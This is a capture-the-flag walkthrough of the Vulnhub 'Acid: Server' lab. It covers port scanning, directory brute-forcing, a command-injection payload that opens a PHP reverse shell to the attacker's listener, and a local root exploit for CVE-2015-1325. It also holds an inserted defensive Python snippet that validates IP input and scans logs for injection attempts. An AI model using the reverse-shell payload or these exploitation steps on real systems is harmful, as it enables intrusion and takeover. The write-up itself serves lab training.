[Vulnhub]Acid: Server

Acid: Server was created by Avinash Kumar Thapa.

For more information and the OVA file download, please check here.

Attacker & Target

Attacker: Kali Linux (10.1.1.130/24)

Target: Acid: Server (10.1.1.132/24)

Vulnerability & Exploit

  • Hints are stored in some pages' source code or titles; otherwise dirbuster/wfuzz can be used to find hidden folders
  • A command injection vulnerability exists in /Challenge/Magic_Box/command.php; exploiting it yields a reverse shell
  • The Apport/Ubuntu local root race condition (CVE-2015-1325) is present; exploiting it gives ROOT

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover the running services and open ports [unicornscan & nmap]
  • Web information gathering and interaction with the web server [firefox]
  • Brute-force scan to find hidden paths [dirbuster]
  • Found the hidden folder and a page with a command injection vulnerability; analysed it with Burp Suite and exploited it to get a reverse shell
  • Enumerated the host and found it vulnerable to CVE-2015-1325; exploited it to get ROOT

Tools

All the tools used here can be found in Kali Linux.

Walkthrough

As a routine first step, I use arp-scan to detect the target's IP address (10.1.1.132 in this case).

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.132    00:0c:29:36:7b:18   VMware, Inc.
10.1.1.254    00:50:56:fb:ea:26   VMware, Inc.

10.1.1.132 is our Target!

Then I run unicornscan to detect open ports on the target (unicornscan is much faster than nmap for a full port scan, so I use it for the full scan and then use nmap for a deeper scan of the discovered ports).

root@kali:~# us -H -msf -p 1-65535 -Iv -T4 10.1.1.132
adding 10.1.1.132/32 mode `TCPscan' ports `1-65535' pps 300
using interface(s) eth0
scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a little longer than 3 Minutes, 45 Seconds
connected 10.1.1.130:14028 -> 10.1.1.132:33447
TCP open 10.1.1.132:33447  ttl 64
sender statistics 291.2 pps with 65535 packets sent total
listener statistics 131074 packets recieved 0 packets droped and 0 interface drops
TCP open           unknown[33447]     from 10.1.1.132  ttl 64

From the result above, TCP port 33447 has been discovered.

Then I run an nmap scan to probe for more detailed information about the open port.

Host is up (0.00029s latency).
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: /Challenge
MAC Address: 00:0C:29:36:7B:18 (VMware)

I found that Apache 2.4.10 is running on port 33447 and the server OS is Ubuntu Linux.

Then I start Firefox to take a closer look at the web application. The hidden path can be found from the page title, from a dirbuster scan, or by decoding the password at the bottom of the page source.

The hidden folder is /Challenge.

Then I keep running dirbuster against the /Challenge/ folder and find some pages; one of them, cake.php, again has a title that gives the clue to another hidden folder, /Magic_Box.

Running dirbuster against the /Challenge/Magic_Box folder turns up an interesting PHP page, command.php, which has a command injection vulnerability.

Then, using Burp proxy to tamper with the request, I exploit the command injection vulnerability to get a shell. Since there is no wget on the target server, I use the following PHP command:

Payload (it needs to be URL encoded):

127.0.0.1; php -r '$sock=fsockopen("10.1.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

After setting up nc to listen on port 4444 and sending the payload to the server, I get a reverse shell with the limited privileges of www-data.
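From the defender's side, the command.php bug above is the classic "host to ping" parameter that is concatenated into a shell command. The following Python is an added example, not code from the original post or the Acid: Server VM: it shows the allowlist check a fixed command.php should apply (only a single IP address is accepted) and a small Apache access-log scan that flags requests to that page carrying shell metacharacters. The parameter name "IP", the log lines and the timestamps are constructed for the example; the page did not give the real parameter name.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that let a "ping this host" value escape into a
# second command, as in the walkthrough's "127.0.0.1; php -r ..." payload.
SHELL_META = re.compile(r"[;&|`$()<>\n\r]")

# Apache combined log format; the request line is split into method/target.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_valid_target(value: str) -> bool:
    """Allowlist check a fixed command.php should apply before building a
    shell command: the input must parse as one IP address and nothing else
    (in PHP the value should additionally be wrapped in escapeshellarg())."""
    try:
        ip_address(value.strip())
    except ValueError:
        return False
    return True

def flag_injection_attempts(log_lines, page="/Challenge/Magic_Box/command.php"):
    """Return (src, timestamp, param, value) for each request to the vulnerable
    page whose query parameter carries shell metacharacters or fails the IP
    allowlist. Only query strings are visible here: POST bodies are not in the
    access log, so this is a necessary but not sufficient check."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != page:
            continue
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:  # parse_qs already percent-decodes
                if SHELL_META.search(value) or not is_valid_target(value):
                    hits.append((m["src"], m["ts"], name, value))
    return hits

# Constructed sample log: one benign request, one injection attempt, one unrelated page.
SAMPLE_LOG = [
    '10.1.1.130 - - [03/Sep/2015:19:30:01 +1000] "GET /Challenge/Magic_Box/command.php?IP=127.0.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.1.1.130 - - [03/Sep/2015:19:31:12 +1000] "GET /Challenge/Magic_Box/command.php?IP=127.0.0.1%3B%20id HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '10.1.1.130 - - [03/Sep/2015:19:31:40 +1000] "GET /Challenge/cake.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in flag_injection_attempts(SAMPLE_LOG):
        print("suspicious request:", hit)
```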

After some enumeration and poking around, I find the target server is Ubuntu 15.04, which is vulnerable to local privilege escalation via CVE-2015-1325.

Compile the exploit, send it to the target server, then run it to get ROOT!

www-data@acid:/tmp$ ./37088
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 2571
apport stopped, pid = 2572
getting pid 2571
current pid = 2570..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..2500..
** child: current pid = 2571
** child: executing /bin/su
Password: sleeping 2s..

checker: mode 4516
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..
success
# id
id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
  ____                            _         _       _   _                 
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                   
root@acid:/tmp# cd /root
cd /root
root@acid:~# ls
ls
flag.txt
root@acid:~# cat flag.txt
cat flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143


root@acid:~#
2015-09-03 19:36:37 +1000